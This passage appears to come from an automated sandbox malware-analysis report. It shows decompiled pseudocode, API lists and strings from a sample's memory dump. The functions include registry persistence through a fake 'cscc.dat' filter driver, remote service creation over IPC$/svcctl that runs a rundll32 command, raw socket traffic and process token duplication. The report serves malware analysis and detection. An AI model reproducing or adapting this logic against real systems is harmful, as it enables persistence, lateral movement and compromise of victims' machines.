								if(_a28 + 8 <= (_t186 & 0x0000ffff)) {
									_t234 =  *_a32;
									asm("cdq");
									asm("sbb eax, edx");
									 *((intOrPtr*)(_t234 + 0x48)) =  *((intOrPtr*)(_t255 + 0x4c)) - ( *(_t234 + 0x51) & 0x000000ff);
									 *((intOrPtr*)(_t234 + 0x4c)) =  *((intOrPtr*)(_v12 + 0x50));
									if(1 !=  *_t234) {
										 *(_t261 + 4) = 8;
									} else {
										 *(_t261 + 4) = 4;
									}
									 *(_t261 + 0xc) =  *(_t261 + 4);
									 *((intOrPtr*)(_t261 + 0x10)) = 0x48;
									 *(_t261 + 0x14) =  *(_t234 + 0x54) & 0x000000ff;
									 *(_t261 + 0x25) =  *(_t261 + 4) + 1;
									 *((intOrPtr*)(_t223 + 1)) =  *((intOrPtr*)(_t234 + 0x48));
									 *((intOrPtr*)(_t223 + 5)) =  *((intOrPtr*)(_t234 + 0x4c));
									if(E007B3209(_t234, _a4,  *_a8,  *(_t234 + 0x30) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff) != 0) {
										Sleep(0x7d0);
										_push(2);
										asm("stosw");
										asm("stosb");
										 *(_t261 + 8) = 0;
										 *(_t261 + 0x18) = 0;
										_t207 =  *_a32;
										 *(_t261 + 4) = 0;
										 *(_t261 + 0xc) = 0;
										 *((intOrPtr*)(_t261 + 0x10)) = 0;
										 *(_t261 + 0x14) = 0;
										 *((intOrPtr*)(_t261 + 0x1c)) = 0x48;
										 *(_t261 + 0x20) =  *(_t207 + 0x59) & 0x000000ff;
										 *(_t261 + 0x25) =  *(_t261 + 8) + 1;
										 *((short*)(_t223 + 1)) =  *((intOrPtr*)(_t207 + 0x32));
										if(E007B3209( *(_t261 + 0x25) & 0x0000ffff, _a4,  *_a8,  *(_t207 + 0x30) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff) != 0) {
											Sleep(0x7d0);
											_t212 = HeapAlloc(GetProcessHeap(), 8, _a28);
											 *_a24 = _t212;
											if(_t212 != 0) {
												memcpy(_t212, _v12 + 0x54, _a28);
												_v5 = 1;
											}
										}
									}
								}
							}
						}
					}
					HeapFree(GetProcessHeap(), 8, _a20);
					goto L21;
				}
			}

0x007b3d0d
0x007b3d10
0x007b3d11
0x007b3d15
0x007b3d27
0x007b3d34
0x007b3d36
0x007b3d3b
0x007b40da
0x007b40e0
0x007b40e0
0x007b3d4b
0x007b3d4f
0x007b40cb
0x007b40d3
0x00000000
0x007b40d9
0x007b3d59
0x007b3d5c
0x007b3d68
0x007b3d6c
0x007b40bf
0x007b40c5
0x00000000
0x007b40c5
0x007b3d75
0x007b3d7d
0x007b3dca
0x007b3dd5
0x007b3dd9
0x007b3ddc
0x007b3ddf
0x007b3ded
0x007b3df3
0x007b3df9
0x007b3dfc
0x007b3e00
0x007b3e03
0x007b3e06
0x007b3e0a
0x007b3e0e
0x007b3e12
0x007b3e16
0x007b3e1a
0x007b3e1e
0x007b3d7f
0x007b3d7f
0x007b3d8a
0x007b3d8e
0x007b3d91
0x007b3d94
0x007b3d9f
0x007b3da5
0x007b3da8
0x007b3dac
0x007b3db0
0x007b3db4
0x007b3db8
0x007b3dbc
0x007b3dc0
0x007b3dc4
0x007b3dc4
0x007b3e25
0x007b3e2c
0x007b3e35
0x007b3e50
0x007b40b3
0x007b40b9
0x00000000
0x007b3e56
0x007b3e5b
0x007b3e68
0x007b3e6e
0x007b3e73
0x00000000
0x00000000
0x007b3e7e
0x007b3e81
0x007b3e86
0x007b3e89
0x007b3e90
0x007b3e97
0x007b3e98
0x007b3ea1
0x007b3ea4
0x007b3ea9
0x007b3eaa
0x007b3eb2
0x007b3eb3
0x007b3eb5
0x007b3eba
0x007b3ec3
0x007b3ecb
0x007b3ecc
0x007b3ed2
0x007b3eda
0x007b3ee2
0x007b3eeb
0x007b3ef2
0x007b3efc
0x007b3f0f
0x007b3f1d
0x007b3f24
0x007b3f2a
0x007b3f38
0x007b3f40
0x007b3f54
0x007b3f57
0x007b3f5c
0x007b3f6d
0x007b3f76
0x007b3f7f
0x007b3f88
0x007b3f8a
0x007b3f8d
0x007b3f96
0x007b3fa1
0x007b3f98
0x007b3f98
0x007b3f98
0x007b3fab
0x007b3fae
0x007b3fb9
0x007b3fc2
0x007b3fc9
0x007b3fcf
0x007b3fed
0x007b3ff8
0x007b4000
0x007b4004
0x007b4006
0x007b4008
0x007b400b
0x007b4011
0x007b4015
0x007b4018
0x007b401b
0x007b401e
0x007b4021
0x007b402c
0x007b4035
0x007b403d
0x007b405c
0x007b4063
0x007b4075
0x007b407e
0x007b4082
0x007b408f
0x007b4097
0x007b4097
0x007b4082
0x007b405c
0x007b3fed
0x007b3f6d
0x007b3f40
0x007b3f24
0x007b40a7
0x00000000
0x007b40ad

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74654F20,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?), ref: 007B3D2B
HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D34
GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 007B3D46
HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D49
GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B3D63
HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D66
Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,007B4269,?,00000000,?,?,?), ref: 007B3E5B
GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B3E65
HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3E68
rand.MSVCRT ref: 007B3EC3
memset.MSVCRT ref: 007B3EFC

Part of subcall function 007B3209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,007B3BAA,?,?,?,00000000,00000000,?,?,?,007B4A6E), ref: 007B3220
Part of subcall function 007B3209: HeapAlloc.KERNEL32(00000000,?,007B3BAA,?,?,?,00000000,00000000,?,?,?,007B4A6E,?,?,?,?), ref: 007B3227
Part of subcall function 007B3209: htons.WS2_32(?), ref: 007B3246
Part of subcall function 007B3209: memcpy.MSVCRT ref: 007B3276
Part of subcall function 007B3209: send.WS2_32(?,00000000,?,00000000), ref: 007B3287
Part of subcall function 007B3209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B329A
Part of subcall function 007B3209: HeapFree.KERNEL32(00000000), ref: 007B32A1

recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 007B3F38
htons.WS2_32(?), ref: 007B3F5C
Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 007B3FF8
Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 007B4063
GetProcessHeap.KERNEL32(00000008,?), ref: 007B406E
HeapAlloc.KERNEL32(00000000), ref: 007B4075
memcpy.MSVCRT ref: 007B408F
GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,?,?,?,?,007B4269,?,00000000,?,?), ref: 007B40A0
HeapFree.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B40A7
GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,007B4269,?,00000000,?,?), ref: 007B40B6
HeapFree.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B40B9
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B40C2
HeapFree.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B40C5
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B40D0
HeapFree.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B40D3

Strings

Oet Uet0Xet, xrefs: 007B406E, 007B40A0, 007B40AD

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$Sleep$htonsmemcpy$memsetrandrecvsend
String ID: Oet Uet0Xet
API String ID: 2208892845-3175316637
Opcode ID: 2b61d3a5ed11e8b6ba1376f64016b1f15a2a0ba0927e248da72e0f9f63f90336
Instruction ID: c6abd47c14af7fae881c890f4bb1c35bc0688828dc3b18830f2c8d3eb8a4010c
Opcode Fuzzy Hash: 2b61d3a5ed11e8b6ba1376f64016b1f15a2a0ba0927e248da72e0f9f63f90336
Instruction Fuzzy Hash: 4BD15BB0100344AFDB20DF69C884BAABBF5FF48304F158599F989DB292E779D845CB64

Uniqueness

Uniqueness Score: -1.00%

Function 007B13E8 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 118
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B13E8() {
				void* _v8;
				char _v12;
				int _v16;
				char _v20;
				int _v24;
				short _v544;
				long _t45;
				signed int _t47;
				short* _t49;
				int _t54;

				_v16 = 0;
				wsprintfW( &_v544, L"SYSTEM\\CurrentControlSet\\services\\%ws", L"cdfs");
				if(RegOpenKeyExW(0x80000002,  &_v544, 0, 0xf003f,  &_v8) == 0) {
					_t54 = 4;
					_t49 = L"Start";
					_v12 = 0;
					_v24 = _t54;
					if(RegQueryValueExW(_v8, _t49, 0, 0,  &_v12,  &_v24) == 0 && _v12 == _t54) {
						_v12 = 0;
						if(RegSetValueExW(_v8, _t49, 0, _t54,  &_v12, _t54) == 0 && RegSetValueExW(_v8, _t49, 0, 4,  &_v12, 4) == 0 && RegSetValueExW(_v8, L"Group", 0, 1, L"Filter", 0xe) == 0 && RegSetValueExW(_v8, L"DependOnService", 0, 7, L"FltMgr", 0xe) == 0) {
							_v20 = 3;
							if(RegSetValueExW(_v8, L"ErrorControl", 0, 4,  &_v20, 4) == 0) {
								_t45 = RegSetValueExW(_v8, L"ImagePath", 0, 2, L"cscc.dat", 0x12);
								if(_t45 == 0) {
									do {
										_t47 =  *(L"cdfs" + _t45) & 0x0000ffff;
										 *(L"cscc" + _t45) = _t47;
										_t45 = _t45 + 2;
									} while (_t47 != 0);
									_v16 = 1;
								}
							}
						}
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}

0x007b1405
0x007b1408
0x007b142f
0x007b1439
0x007b1444
0x007b144d
0x007b1450
0x007b145b
0x007b147b
0x007b1482
0x007b14e2
0x007b14ed
0x007b1501
0x007b1505
0x007b1507
0x007b1507
0x007b150e
0x007b1515
0x007b1518
0x007b151d
0x007b151d
0x007b1505
0x007b14ed
0x007b1482
0x007b1523
0x007b152a
0x007b1530

APIs

wsprintfW.USER32 ref: 007B1408
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 007B1427
RegQueryValueExW.ADVAPI32(?,Start,00000000,00000000,?,?,?,00000000), ref: 007B1453
RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 007B147E
RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 007B1495
RegSetValueExW.ADVAPI32(?,Group,00000000,00000001,Filter,0000000E,?,00000000), ref: 007B14B3
RegSetValueExW.ADVAPI32(?,DependOnService,00000000,00000007,FltMgr,0000000E,?,00000000), ref: 007B14CB
RegSetValueExW.ADVAPI32(?,ErrorControl,00000000,00000004,?,00000004,?,00000000), ref: 007B14E9
RegSetValueExW.ADVAPI32(?,ImagePath,00000000,00000002,cscc.dat,00000012,?,00000000), ref: 007B1501
RegCloseKey.ADVAPI32(?,?,00000000), ref: 007B1523

Strings

cscc, xrefs: 007B150E
ErrorControl, xrefs: 007B14DA
DependOnService, xrefs: 007B14C3
Group, xrefs: 007B14AB
FltMgr, xrefs: 007B14BB
Start, xrefs: 007B1444, 007B1449, 007B1477, 007B1491
cdfs, xrefs: 007B13F2, 007B1507
ImagePath, xrefs: 007B14F9
SYSTEM\CurrentControlSet\services\%ws, xrefs: 007B13FD
Filter, xrefs: 007B14A1
cscc.dat, xrefs: 007B14F1

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Value$CloseOpenQuerywsprintf
String ID: DependOnService$ErrorControl$Filter$FltMgr$Group$ImagePath$SYSTEM\CurrentControlSet\services\%ws$Start$cdfs$cscc$cscc.dat
API String ID: 693892761-175094307
Opcode ID: dfc4a3210a2819465a378a90b06cdabf76f30579188a4793e938665953a1f786
Instruction ID: d52ed94ac5c9b95ed6890d98b16a84d2d34e3ce5cfb93764db56f50bc8fc0026
Opcode Fuzzy Hash: dfc4a3210a2819465a378a90b06cdabf76f30579188a4793e938665953a1f786
Instruction Fuzzy Hash: E63152B1A4121DFAEB209B918D49FEFBB7CEF54B44F500099B601F1090E3789F119AE5

Uniqueness

Uniqueness Score: -1.00%

Function 007B516B Relevance: 33.2, APIs: 17, Strings: 5, Instructions: 172
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E007B516B(void* __ecx, intOrPtr _a4, char _a8, signed int _a12, signed char _a15, signed int _a16, intOrPtr _a20) {
				char _v5;
				signed int _v12;
				void* _v16;
				char* _v20;
				void* _t72;
				void* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t84;
				intOrPtr* _t91;
				intOrPtr* _t104;
				void* _t109;
				signed int _t112;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t118;
				intOrPtr* _t122;

				_t126 = _a4;
				_v5 = 0;
				if(E007B1EB9(_a4,  &_a8, _a12, "IPC$") != 0) {
					_v12 = _v12 & 0x00000000;
					if(E007B2054(_t126, _a8,  &_v12, "svcctl", 1) != 0 && E007B4E60(_t126, _a8, _v12) != 0) {
						_t72 = HeapAlloc(GetProcessHeap(), 8, 0x14);
						_v16 = _t72;
						if(_t72 != 0) {
							if(E007B4F43(_v12, _t126, _a8,  &_v16) != 0) {
								_t79 = HeapAlloc(GetProcessHeap(), 8, 0x20);
								_v20 = _t79;
								if(_t79 != 0) {
									_t80 = rand();
									asm("cdq");
									_push(_t80 % 0xf4240);
									_t82 = rand();
									asm("cdq");
									_t112 = 0xa;
									_push(_t82 % _t112);
									_t84 = rand();
									_t113 = 0xa;
									asm("cdq");
									_push(_t84 % _t113);
									sprintf(_v20, "clr_optimization_v%d.%d.%d");
									_t109 = HeapAlloc(GetProcessHeap(), 8, 0x208);
									if(_t109 != 0) {
										_t122 = _a16;
										_t91 = _t122;
										_a15 = 0;
										_a16 = _t91 + 1;
										do {
											_t115 =  *_t91;
											_t91 = _t91 + 1;
										} while (_t115 != 0);
										if(_t91 != _a16) {
											_t116 = 0;
											do {
												_a15 = _a15 + 1;
												 *((char*)(_t109 + _t116)) =  *((intOrPtr*)(_t116 + _t122));
												_t104 = _t122;
												_a16 = _t104 + 1;
												do {
													_t118 =  *_t104;
													_t104 = _t104 + 1;
												} while (_t118 != 0);
												_t116 = _a15 & 0x000000ff;
											} while (_t116 < _t104 - _a16);
										}
										sprintf(_t109, "rundll32 %s,#2 %s", _a20, _t122);
										_a16 = _a16 & 0x00000000;
										_a12 = _a12 & 0x00000000;
										if(E007B4B5D(_v20, _v16, _t109,  &_a16,  &_a12) != 0 && E007B501E(_t115, _a4, _a8, _v12, _a16, _a12,  &_v16) != 0 && E007B50A2(_t115, _a4, _a8, _v12, _v16) != 0) {
											_v5 = 1;
										}
										HeapFree(GetProcessHeap(), 8, _t109);
									}
									HeapFree(GetProcessHeap(), 8, _v20);
								}
							}
							HeapFree(GetProcessHeap(), 8, _v16);
						}
					}
				}
				return _v5;
			}

0x007b5172
0x007b5182
0x007b518d
0x007b5193
0x007b51ad
0x007b51dc
0x007b51de
0x007b51e3
0x007b51fb
0x007b5208
0x007b520a
0x007b520f
0x007b521b
0x007b521d
0x007b5225
0x007b5226
0x007b522a
0x007b522b
0x007b522e
0x007b522f
0x007b5233
0x007b5234
0x007b523d
0x007b5246
0x007b5257
0x007b525b
0x007b5261
0x007b5264
0x007b5269
0x007b526d
0x007b5270
0x007b5270
0x007b5272
0x007b5273
0x007b527a
0x007b527c
0x007b527e
0x007b5281
0x007b5284
0x007b5287
0x007b528c
0x007b528f
0x007b528f
0x007b5291
0x007b5292
0x007b5296
0x007b529d
0x007b527e
0x007b52ab
0x007b52ad
0x007b52b1
0x007b52ce
0x007b5301
0x007b5301
0x007b530b
0x007b530b
0x007b5319
0x007b5319
0x007b520f
0x007b5327
0x007b5327
0x007b532e
0x007b51ad
0x007b5334

APIs

Part of subcall function 007B1EB9: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,007B943A), ref: 007B1ED2
Part of subcall function 007B1EB9: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,007B943A), ref: 007B1EDB
Part of subcall function 007B1EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,007B943A), ref: 007B1F1F
Part of subcall function 007B1EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B1F22
Part of subcall function 007B1EB9: htons.WS2_32(?), ref: 007B1F41

Part of subcall function 007B2054: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,007B943A), ref: 007B206D
Part of subcall function 007B2054: HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B2076
Part of subcall function 007B2054: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,007B943A), ref: 007B209C
Part of subcall function 007B2054: HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B209F
Part of subcall function 007B2054: htons.WS2_32(?), ref: 007B20BC
Part of subcall function 007B2054: send.WS2_32(?,00000000,?,00000000), ref: 007B2131
Part of subcall function 007B2054: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 007B2148
Part of subcall function 007B2054: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,007B943A), ref: 007B2168
Part of subcall function 007B2054: HeapFree.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B216F

Part of subcall function 007B4E60: GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 007B4E76
Part of subcall function 007B4E60: HeapAlloc.KERNEL32(00000000), ref: 007B4E79
Part of subcall function 007B4E60: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B4F2A
Part of subcall function 007B4E60: HeapFree.KERNEL32(00000000), ref: 007B4F2D
Part of subcall function 007B4E60: GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 007B4F32
Part of subcall function 007B4E60: HeapFree.KERNEL32(00000000), ref: 007B4F35

GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 007B51D3
HeapAlloc.KERNEL32(00000000), ref: 007B51DC

Part of subcall function 007B4F43: GetProcessHeap.KERNEL32(00000008,00000068,74654F20,?,77D74620,?,007B51F9,?,?,?), ref: 007B4F56
Part of subcall function 007B4F43: HeapAlloc.KERNEL32(00000000,?,007B51F9,?,?,?), ref: 007B4F5D
Part of subcall function 007B4F43: rand.MSVCRT ref: 007B4F86
Part of subcall function 007B4F43: GetProcessHeap.KERNEL32(00000008,?,007B51F9,?,00000000,?,007B51F9,007B51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 007B4FF7
Part of subcall function 007B4F43: HeapFree.KERNEL32(00000000), ref: 007B4FFE
Part of subcall function 007B4F43: GetProcessHeap.KERNEL32(00000008,00000000,007B51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,007B51F9,?,?,?), ref: 007B5007
Part of subcall function 007B4F43: HeapFree.KERNEL32(00000000,?,007B51F9,?,?,?), ref: 007B500E

GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 007B5205
HeapAlloc.KERNEL32(00000000), ref: 007B5208
rand.MSVCRT ref: 007B521B
rand.MSVCRT ref: 007B5226
rand.MSVCRT ref: 007B522F
sprintf.MSVCRT ref: 007B5246
GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5252
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5255
sprintf.MSVCRT ref: 007B52AB
GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 007B5308
HeapFree.KERNEL32(00000000), ref: 007B530B
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5316
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5319
GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 007B5324
HeapFree.KERNEL32(00000000), ref: 007B5327

Strings

svcctl, xrefs: 007B5199
Uet0Xet, xrefs: 007B530B, 007B5319, 007B5327
rundll32 %s,#2 %s, xrefs: 007B52A5
clr_optimization_v%d.%d.%d, xrefs: 007B523E
IPC$, xrefs: 007B5175

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFree$rand$htonssprintf$Allocaterecvsend
String ID: Uet0Xet$IPC$$clr_optimization_v%d.%d.%d$rundll32 %s,#2 %s$svcctl
API String ID: 1531986241-3748780712
Opcode ID: 23d262dcc1ef4fce0a48f8f6508f3df0588f7ec3f29b00a1b8fd443a5b3e5f82
Instruction ID: 188c9c01527609c878b5bed92cccd12ba165428f8848045cc8485e4dd2a983ab
Opcode Fuzzy Hash: 23d262dcc1ef4fce0a48f8f6508f3df0588f7ec3f29b00a1b8fd443a5b3e5f82
Instruction Fuzzy Hash: E4518EB1900249BBDF119FA4CC45FEE7BA9EF49304F048055FA44A7292DBBAD915CB60

Uniqueness

Uniqueness Score: -1.00%

Function 007B85FB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 147
processCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E007B85FB(void* __eflags, long _a4, void _a8, void* _a12, long _a16, void _a20, int _a24, intOrPtr _a36, void* _a88, char _a92, long _a96, char _a648, int _a656, void _a660) {
				void* _v0;
				void* _v4;
				void _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				void* _t62;
				void* _t69;
				signed int _t85;
				signed int _t89;
				intOrPtr _t103;
				signed int _t107;
				void* _t109;

				E007BA760(0x1294);
				_a8 = 0;
				_a24 = 0;
				_a656 = 0;
				memset( &_a660, 0, 0xffc);
				_t109 = (_t107 & 0xfffffff8) + 0xc;
				_v0 = 0;
				_a36 = E007B8147();
				_t62 = CreateToolhelp32Snapshot(2, 0);
				_a16 = _t62;
				if(_t62 == 0xffffffff) {
					L21:
					return _a4;
				}
				_push( &_a92);
				_a92 = 0x22c;
				if(Process32FirstW(_t62) == 0) {
					GetLastError();
					L20:
					CloseHandle(_a12);
					goto L21;
				}
				_a24 = _a4 -  &_a648;
				do {
					_a8 = _a8 | 0xffffffff;
					_v4 = 0;
					_a4 = 0;
					_t69 = OpenProcess(0x450, 0, _a96);
					_a20 = _t69;
					if(_t69 == 0) {
						L16:
						if(_v0 >= 0x40) {
							goto L20;
						}
						goto L17;
					}
					if(OpenProcessToken(_t69, 0x2000000,  &_v4) == 0 || GetTokenInformation(_v4, 0xc,  &_a8, 4,  &_a16) == 0 || _a24 != 0 && _a4 == 0 || DuplicateTokenEx(_v8, 0x2000000, 0, 2, 2,  &_v0) == 0) {
						L15:
						CloseHandle(_v4);
						CloseHandle(_a20);
						goto L16;
					} else {
						memset( &_a20, 0, 0x38);
						_t109 = _t109 + 0xc;
						if(GetTokenInformation(_v8, 0xa,  &_a20, 0x38,  &_a4) == 0) {
							goto L15;
						}
						_t103 = _a24;
						_t85 = 0;
						if(_v24 <= 0) {
							L13:
							if(SetTokenInformation(_v12, 0xc,  &_v8, 4) != 0) {
								_t89 = _v28 << 2;
								_v20 = _v20 + 1;
								_v28 = _v28 + 1;
								 *((intOrPtr*)(_t109 + _a4 + _t89 + 0x2a0)) = _v16;
								 *((intOrPtr*)(_t109 + _t89 + 0x2a0)) = _t103;
							}
							goto L15;
						}
						while( *((intOrPtr*)(_t109 + 0x2a0 + _t85 * 4)) != _t103) {
							_t85 = _t85 + 1;
							if(_t85 < _v24) {
								continue;
							}
							goto L13;
						}
						goto L15;
					}
					L17:
				} while (Process32NextW(_a12,  &_a88) != 0);
				goto L20;
			}

0x007b8606
0x007b861e
0x007b8622
0x007b8626
0x007b862d
0x007b8632
0x007b8635
0x007b8641
0x007b8645
0x007b864b
0x007b8652
0x007b87da
0x007b87e4
0x007b87e4
0x007b865c
0x007b865e
0x007b866e
0x007b87ca
0x007b87d0
0x007b87d4
0x00000000
0x007b87d4
0x007b8680
0x007b8689
0x007b868d
0x007b8698
0x007b869c
0x007b86a0
0x007b86a6
0x007b86ac
0x007b87aa
0x007b87af
0x00000000
0x00000000
0x00000000
0x007b87af
0x007b86c1
0x007b8798
0x007b87a2
0x007b87a8
0x00000000
0x007b8716
0x007b871e
0x007b8723
0x007b873c
0x00000000
0x00000000
0x007b873e
0x007b8742
0x007b8748
0x007b875a
0x007b876f
0x007b877d
0x007b8782
0x007b8786
0x007b878a
0x007b8791
0x007b8791
0x00000000
0x007b876f
0x007b874a
0x007b8753
0x007b8758
0x00000000
0x00000000
0x00000000
0x007b8758
0x00000000
0x007b874a
0x007b87b1
0x007b87c0
0x00000000

APIs

memset.MSVCRT ref: 007B862D

Part of subcall function 007B8147: memset.MSVCRT ref: 007B8160
Part of subcall function 007B8147: GetVersionExW.KERNEL32(?,?,?,746543E0), ref: 007B8179

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007B8645
Process32FirstW.KERNEL32 ref: 007B8666
OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 007B86A0
OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 007B86B9
GetTokenInformation.ADVAPI32(000000FF,0000000C(TokenIntegrityLevel),?,00000004,?), ref: 007B86DF
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 007B8708
memset.MSVCRT ref: 007B871E
GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),?,00000038,?,?,00000000,?), ref: 007B8738
SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 007B8767
CloseHandle.KERNEL32(?), ref: 007B87A2
CloseHandle.KERNEL32(?), ref: 007B87A8
Process32NextW.KERNEL32(?,?), ref: 007B87BA
GetLastError.KERNEL32 ref: 007B87CA
CloseHandle.KERNEL32(?), ref: 007B87D4

Strings

@, xrefs: 007B87AA

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

